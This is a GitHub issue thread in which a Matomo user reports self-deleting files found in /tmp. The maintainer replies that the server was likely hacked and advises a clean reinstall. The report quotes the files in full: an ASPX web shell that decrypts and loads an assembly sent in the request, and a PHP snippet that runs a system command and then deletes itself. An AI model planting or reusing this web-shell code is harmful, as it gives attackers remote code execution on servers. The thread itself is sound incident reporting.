### ISSUE TITLE
Matomo generates suspicious files in /tmp directory

### ISSUE THREAD

**Issue by MiumMi** [piwik/piwik#21201]
## Context

I noticed that Matomo has generated some suspicious files in the /tmp directory. Specifically, I found two files named php0dmsfg and phpydTkOD, which contain the following code:
```
<%@ Page Language="C#" %><%@Import Namespace="System.Reflection"%><%Session.Add("k","e45e329feb5d925b"); Encoding.Default.GetBytes(Session[0] + ""),c = Request.BinaryRead(Request.ContentLength);Assembly.Load(new System.Security.Cryptography.RijndaelManaged().CreateDecryptor(k, k).TransformFinalBlock(c, 0, c.Length)).CreateInstance("U").Equals(this);
```
```
<?php system("id");unlink(__FILE__);?>
```
These files are automatically executed after they are generated and automatically deleted after they are executed. Is this phenomenon normal? I am concerned that these files may be related to security issues or vulnerabilities in Matomo.

## Expected Behavior

Matomo should not generate suspicious files in the /tmp directory.

## Current Behavior

Matomo has generated suspicious files in the /tmp directory, which contain potentially malicious code.

## Possible Solution

It is necessary to confirm whether these files are generated by matomo. If they are generated by matomo, it is recommended to investigate the causes of these files in time and take appropriate measures to prevent the recurrence of such files

## Steps to Reproduce (for Bugs)

1.These files are generated occasionally, and there are no certain steps to ensure reproduction

## Your Environment

* Matomo Version:  4.4.0
* PHP Version:
* Server Operating System:
* Additionally installed plugins:

* Browser:
* Operating System:

**Comment by sgiehl** [comment]
@MiumMi Those files shouldn't be created by Matomo. If that is the case, maybe your server got infected with some malware or was hacked.
You should backup your Matomo instance and afterwards replace all files with a fresh download, to ensure they aren't modified.
